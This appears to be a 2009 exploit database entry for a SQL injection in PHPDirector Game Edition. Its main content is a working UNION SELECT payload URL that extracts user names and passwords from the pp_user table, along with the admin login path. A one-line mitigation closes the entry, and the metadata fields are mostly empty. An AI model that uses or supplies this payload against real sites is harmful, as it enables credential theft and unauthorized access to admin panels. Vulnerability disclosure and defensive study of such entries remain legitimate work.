vendor:
PHPDirector Game Edition
by:
AtT4CKxT3rR0r1ST
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: PHPDirector Game Edition
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: N/A
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009
PHPDirector Game Edition (game.php) Sql Injection Vulnerability
An attacker can exploit a SQL injection vulnerability in PHPDirector Game Edition (game.php) to gain access to the admin panel. The attacker can use the following URL to inject malicious SQL code: www.site.com/games.php?id=null[Sql Injection] www.site.com/games.php?id=null+and+1=2+union+select+1,group_concat(id,0x3a,user,0x3a,pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+pp_user. The admin panel can be accessed at www.site.com/admin/login.php.
Mitigation:
Input validation should be used to prevent SQL injection attacks. All user-supplied input should be validated and filtered before being used in an SQL query.